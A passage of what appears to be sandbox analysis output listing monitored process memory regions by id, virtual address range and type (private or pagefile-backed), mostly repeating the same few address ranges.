"pagefile_0x0000000000400000" filename = "" Region: id = 8490 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8491 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8492 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8493 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8494 start_va = 0x400000 end_va = 0x403fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8495 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8496 start_va = 0x9bc0000 end_va = 0xa0b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bc0000" filename = "" Region: id = 8497 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8498 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8499 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8500 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8501 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8502 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8503 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8504 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8505 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8506 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8507 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8508 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8509 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8510 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8511 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8512 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8513 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8514 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8515 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8516 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8517 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8518 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8519 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8520 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8521 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8522 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8523 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8524 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8525 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8526 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8527 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8528 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8529 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8530 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8531 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8532 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8533 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8534 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8535 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8536 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8537 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8538 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8539 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8540 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8541 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8542 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8543 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8544 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8545 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8546 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8547 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8548 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8549 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8550 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8551 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8552 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8553 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8554 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8555 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8556 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8557 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8558 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8559 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8560 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8561 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8562 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8563 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8564 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8565 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8566 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8567 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8568 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8569 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8570 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8571 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8572 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8573 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8574 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8575 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8576 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8577 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8578 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8579 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8580 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8581 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8582 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8583 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8584 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8585 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8586 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8587 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8588 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8589 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8590 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8591 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8592 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8593 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8594 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8595 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8596 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8597 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8598 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8599 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8600 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8601 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8602 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8603 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8604 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8605 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8606 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8607 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8608 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8609 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8610 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8611 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8612 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8613 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8614 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8615 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8616 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8617 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8618 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8619 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8620 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8621 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8622 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8623 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8624 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8625 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8626 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8627 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8628 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8629 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8630 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8631 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8632 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8633 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8634 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8635 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8636 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8637 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8638 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8639 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8640 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8641 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8642 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8643 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8644 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8645 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8646 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8647 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8648 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8649 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8650 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8651 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8652 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8653 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8654 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8655 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8656 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8657 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8658 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8659 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8660 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8661 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8662 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8663 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8664 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8665 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8666 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8667 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8668 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8669 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8670 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8671 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8672 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8673 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8674 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8675 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8676 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8677 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8678 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8679 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8680 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8681 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8682 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8683 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8684 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8685 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8686 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8687 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8688 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8689 start_va 